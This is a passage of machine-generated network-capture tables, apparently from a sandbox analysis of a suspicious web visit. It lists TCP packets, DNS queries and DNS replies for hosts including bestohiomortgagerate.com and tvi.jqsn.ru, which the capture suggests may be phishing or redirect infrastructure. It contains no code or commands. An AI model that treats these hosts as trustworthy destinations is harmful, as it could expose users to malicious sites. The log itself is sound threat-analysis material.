                                                                                                                          Apr 17, 2024 02:34:59.161861897 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.208775997 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.208800077 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.258388042 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.476483107 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.476661921 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.476680040 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.476739883 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.476751089 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.476782084 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.476809025 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.476825953 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.476831913 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.477088928 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.477140903 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.477163076 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.477204084 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.477207899 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.477557898 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.477572918 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.477602959 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.477616072 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.477618933 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.477652073 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.477705002 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.477708101 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.478563070 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.478574991 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.478595972 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.478606939 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.478621006 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.478629112 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.478667974 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.478703022 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.478704929 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.479279041 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.479326010 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.479329109 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.529617071 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.797566891 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.797591925 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.797673941 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.797683954 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.797910929 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.797936916 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.797945023 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.797959089 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.797962904 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.797987938 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.798011065 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.798571110 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.798623085 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.823667049 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.823745966 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.823751926 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.823759079 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.823791981 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.824594021 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.824625969 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.824665070 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.824670076 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.824704885 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.824712992 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:59.824767113 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.824923038 CEST49814443192.168.2.4172.67.130.212
                                                                                                                          Apr 17, 2024 02:34:59.824932098 CEST44349814172.67.130.212192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:00.871361017 CEST49815443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:00.871402979 CEST44349815104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:00.871454954 CEST49815443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:00.871798038 CEST49815443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:00.871810913 CEST44349815104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:01.097381115 CEST44349815104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:01.097999096 CEST49815443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:01.098011971 CEST44349815104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:01.098484993 CEST44349815104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:01.099473953 CEST49815443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:01.099550009 CEST44349815104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:01.101026058 CEST49815443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:01.144144058 CEST44349815104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:01.994967937 CEST44349815104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:01.995197058 CEST49815443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:01.995210886 CEST44349815104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:01.995275021 CEST44349815104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:01.995332956 CEST49815443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:01.995501041 CEST49815443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:06.760417938 CEST49816443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:06.760505915 CEST44349816104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:06.760755062 CEST49816443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:06.761594057 CEST49816443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:06.761620998 CEST44349816104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:06.988375902 CEST44349816104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:06.988632917 CEST49816443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:06.988645077 CEST44349816104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:06.988934040 CEST44349816104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:06.989286900 CEST49816443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:06.989330053 CEST44349816104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:07.040764093 CEST49816443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:21.974057913 CEST44349816104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:21.974256039 CEST44349816104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:21.974328995 CEST49816443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:22.402187109 CEST49819443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:22.402247906 CEST44349819104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:22.402319908 CEST49819443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:22.403028965 CEST49819443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:22.403064013 CEST44349819104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:22.633397102 CEST44349819104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:22.633863926 CEST49819443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:22.633919954 CEST44349819104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:22.635052919 CEST44349819104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:22.635725975 CEST49819443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:22.635907888 CEST44349819104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:22.636152029 CEST49819443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:22.680198908 CEST44349819104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:23.311106920 CEST49816443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:23.311175108 CEST44349816104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:23.865665913 CEST44349819104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:23.865967035 CEST44349819104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:23.866147041 CEST49819443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:23.866147041 CEST49819443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:23.866147041 CEST49819443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:24.947778940 CEST49820443192.168.2.4172.217.215.147
                                                                                                                          Apr 17, 2024 02:35:24.947874069 CEST44349820172.217.215.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:24.947968006 CEST49820443192.168.2.4172.217.215.147
                                                                                                                          Apr 17, 2024 02:35:24.948211908 CEST49820443192.168.2.4172.217.215.147
                                                                                                                          Apr 17, 2024 02:35:24.948230028 CEST44349820172.217.215.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:25.167714119 CEST44349820172.217.215.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:25.167951107 CEST49820443192.168.2.4172.217.215.147
                                                                                                                          Apr 17, 2024 02:35:25.167995930 CEST44349820172.217.215.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:25.168468952 CEST44349820172.217.215.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:25.168843031 CEST49820443192.168.2.4172.217.215.147
                                                                                                                          Apr 17, 2024 02:35:25.168929100 CEST44349820172.217.215.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:25.210455894 CEST49820443192.168.2.4172.217.215.147
                                                                                                                          Apr 17, 2024 02:35:28.538680077 CEST49772443192.168.2.4151.101.66.137
                                                                                                                          Apr 17, 2024 02:35:28.538697004 CEST44349772151.101.66.137192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:28.801137924 CEST49821443192.168.2.435.190.80.1
                                                                                                                          Apr 17, 2024 02:35:28.801165104 CEST4434982135.190.80.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:28.801546097 CEST49821443192.168.2.435.190.80.1
                                                                                                                          Apr 17, 2024 02:35:28.801546097 CEST49821443192.168.2.435.190.80.1
                                                                                                                          Apr 17, 2024 02:35:28.801572084 CEST4434982135.190.80.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:29.018306971 CEST4434982135.190.80.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:29.018750906 CEST49821443192.168.2.435.190.80.1
                                                                                                                          Apr 17, 2024 02:35:29.018760920 CEST4434982135.190.80.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:29.022274017 CEST4434982135.190.80.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:29.022329092 CEST49821443192.168.2.435.190.80.1
                                                                                                                          Apr 17, 2024 02:35:29.025525093 CEST49821443192.168.2.435.190.80.1
                                                                                                                          Apr 17, 2024 02:35:29.025696993 CEST4434982135.190.80.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:29.025873899 CEST49821443192.168.2.435.190.80.1
                                                                                                                          Apr 17, 2024 02:35:29.025878906 CEST4434982135.190.80.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:29.069652081 CEST49821443192.168.2.435.190.80.1
                                                                                                                          Apr 17, 2024 02:35:29.260077953 CEST4434982135.190.80.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:29.260191917 CEST4434982135.190.80.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:29.260251999 CEST49821443192.168.2.435.190.80.1
                                                                                                                          Apr 17, 2024 02:35:29.260478020 CEST49821443192.168.2.435.190.80.1
                                                                                                                          Apr 17, 2024 02:35:29.260493040 CEST4434982135.190.80.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:29.261291981 CEST49822443192.168.2.435.190.80.1
                                                                                                                          Apr 17, 2024 02:35:29.261374950 CEST4434982235.190.80.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:29.261636972 CEST49822443192.168.2.435.190.80.1
                                                                                                                          Apr 17, 2024 02:35:29.262054920 CEST49822443192.168.2.435.190.80.1
                                                                                                                          Apr 17, 2024 02:35:29.262088060 CEST4434982235.190.80.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:29.477035999 CEST4434982235.190.80.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:29.486269951 CEST49822443192.168.2.435.190.80.1
                                                                                                                          Apr 17, 2024 02:35:29.486300945 CEST4434982235.190.80.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:29.486773014 CEST4434982235.190.80.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:29.495915890 CEST49822443192.168.2.435.190.80.1
                                                                                                                          Apr 17, 2024 02:35:29.496084929 CEST4434982235.190.80.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:29.496121883 CEST49822443192.168.2.435.190.80.1
                                                                                                                          Apr 17, 2024 02:35:29.537946939 CEST49822443192.168.2.435.190.80.1
                                                                                                                          Apr 17, 2024 02:35:29.538002968 CEST4434982235.190.80.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:29.714725018 CEST4434982235.190.80.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:29.714808941 CEST4434982235.190.80.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:29.714858055 CEST49822443192.168.2.435.190.80.1
                                                                                                                          Apr 17, 2024 02:35:29.714948893 CEST49822443192.168.2.435.190.80.1
                                                                                                                          Apr 17, 2024 02:35:29.714986086 CEST4434982235.190.80.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:29.715008974 CEST49822443192.168.2.435.190.80.1
                                                                                                                          Apr 17, 2024 02:35:29.715034008 CEST49822443192.168.2.435.190.80.1
                                                                                                                          Apr 17, 2024 02:35:35.160593033 CEST44349820172.217.215.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:35.160777092 CEST44349820172.217.215.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:35.160962105 CEST49820443192.168.2.4172.217.215.147
                                                                                                                          Apr 17, 2024 02:35:35.195741892 CEST49820443192.168.2.4172.217.215.147
                                                                                                                          Apr 17, 2024 02:35:35.195769072 CEST44349820172.217.215.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:43.883625031 CEST49823443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:43.883708954 CEST44349823104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:43.883795023 CEST49823443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:43.884030104 CEST49823443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:43.884052038 CEST44349823104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:44.108836889 CEST44349823104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:44.109261990 CEST49823443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:44.109322071 CEST44349823104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:44.110479116 CEST44349823104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:44.110958099 CEST49823443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:44.111167908 CEST44349823104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:44.111392975 CEST49823443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:44.156136036 CEST44349823104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:44.163346052 CEST49823443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:45.196177006 CEST49772443192.168.2.4151.101.66.137
                                                                                                                          Apr 17, 2024 02:35:45.196336031 CEST44349772151.101.66.137192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:45.196419001 CEST49772443192.168.2.4151.101.66.137
                                                                                                                          Apr 17, 2024 02:35:45.369350910 CEST44349823104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:45.369637966 CEST44349823104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:45.369652987 CEST49823443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:45.369714975 CEST44349823104.21.3.147192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:45.369788885 CEST49823443192.168.2.4104.21.3.147
                                                                                                                          Apr 17, 2024 02:35:45.369788885 CEST49823443192.168.2.4104.21.3.147
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Apr 17, 2024 02:34:20.860157967 CEST53643341.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:20.905143976 CEST53641821.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:21.562798023 CEST53560681.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:22.329224110 CEST5656753192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:34:22.329358101 CEST5578753192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:34:22.472160101 CEST53565671.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:22.481456995 CEST53557871.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:22.942218065 CEST5344853192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:34:22.942321062 CEST5205953192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:34:23.223354101 CEST53534481.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:23.224313021 CEST53520591.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:24.892745972 CEST6214853192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:34:24.893264055 CEST5308653192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:34:24.997554064 CEST53621481.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:24.998156071 CEST53530861.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:25.539525986 CEST6349753192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:34:25.545802116 CEST5947053192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:34:25.546447039 CEST5648953192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:34:25.549243927 CEST5793953192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:34:25.644908905 CEST53634971.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:25.650407076 CEST53594701.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:25.650624990 CEST53564891.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:25.653572083 CEST53579391.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:26.884057999 CEST6197253192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:34:26.884191990 CEST5648853192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:34:26.989073992 CEST53619721.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:26.991345882 CEST53564881.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:28.218061924 CEST5049453192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:34:28.218538046 CEST5858653192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:34:28.322742939 CEST53504941.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:28.323311090 CEST53585861.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:28.683878899 CEST5338253192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:34:28.684145927 CEST5551853192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:34:28.788676023 CEST53533821.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:28.789347887 CEST53555181.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:39.973778009 CEST53569711.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.325705051 CEST6494053192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:34:43.325855017 CEST5430953192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:34:43.640177965 CEST53649401.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.699336052 CEST53543091.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:43.964901924 CEST138138192.168.2.4192.168.2.255
                                                                                                                          Apr 17, 2024 02:34:48.242268085 CEST6358253192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:34:48.242379904 CEST6332953192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:34:48.242820024 CEST6122153192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:34:48.243464947 CEST5682253192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:34:48.346987963 CEST53633291.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:48.347616911 CEST53612211.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:48.347650051 CEST53635821.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:48.348076105 CEST53568221.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:50.123100042 CEST53491861.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:52.420757055 CEST53509221.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:34:58.817600965 CEST53521641.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:20.473913908 CEST53524961.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:21.606376886 CEST53549881.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:28.695852041 CEST4952553192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:35:28.696002960 CEST6196853192.168.2.41.1.1.1
                                                                                                                          Apr 17, 2024 02:35:28.800487995 CEST53619681.1.1.1192.168.2.4
                                                                                                                          Apr 17, 2024 02:35:28.800514936 CEST53495251.1.1.1192.168.2.4
                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Apr 17, 2024 02:34:22.329224110 CEST192.168.2.41.1.1.10x2f32Standard query (0)bestohiomortgagerate.comA (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:22.329358101 CEST192.168.2.41.1.1.10x9ab3Standard query (0)bestohiomortgagerate.com65IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:22.942218065 CEST192.168.2.41.1.1.10x402dStandard query (0)tvi.jqsn.ruA (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:22.942321062 CEST192.168.2.41.1.1.10x40ebStandard query (0)tvi.jqsn.ru65IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:24.892745972 CEST192.168.2.41.1.1.10x6f81Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:24.893264055 CEST192.168.2.41.1.1.10x5a81Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:25.539525986 CEST192.168.2.41.1.1.10x2adcStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:25.545802116 CEST192.168.2.41.1.1.10xe9aStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:25.546447039 CEST192.168.2.41.1.1.10x5adStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:25.549243927 CEST192.168.2.41.1.1.10x9107Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:26.884057999 CEST192.168.2.41.1.1.10x95b7Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:26.884191990 CEST192.168.2.41.1.1.10xf8a6Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:28.218061924 CEST192.168.2.41.1.1.10xa766Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:28.218538046 CEST192.168.2.41.1.1.10x5430Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:28.683878899 CEST192.168.2.41.1.1.10xbec3Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:28.684145927 CEST192.168.2.41.1.1.10xff23Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:43.325705051 CEST192.168.2.41.1.1.10x953cStandard query (0)tvi.jqsn.ruA (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:43.325855017 CEST192.168.2.41.1.1.10xcc37Standard query (0)tvi.jqsn.ru65IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:48.242268085 CEST192.168.2.41.1.1.10x247fStandard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:48.242379904 CEST192.168.2.41.1.1.10xf135Standard query (0)cdn.socket.io65IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:48.242820024 CEST192.168.2.41.1.1.10xcc9Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:48.243464947 CEST192.168.2.41.1.1.10x9e0dStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:35:28.695852041 CEST192.168.2.41.1.1.10x2dc9Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:35:28.696002960 CEST192.168.2.41.1.1.10x74d7Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Apr 17, 2024 02:34:22.472160101 CEST1.1.1.1192.168.2.40x2f32No error (0)bestohiomortgagerate.com69.49.228.234A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:23.223354101 CEST1.1.1.1192.168.2.40x402dNo error (0)tvi.jqsn.ru104.21.3.147A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:23.223354101 CEST1.1.1.1192.168.2.40x402dNo error (0)tvi.jqsn.ru172.67.130.212A (IP address)IN (0x0001)false
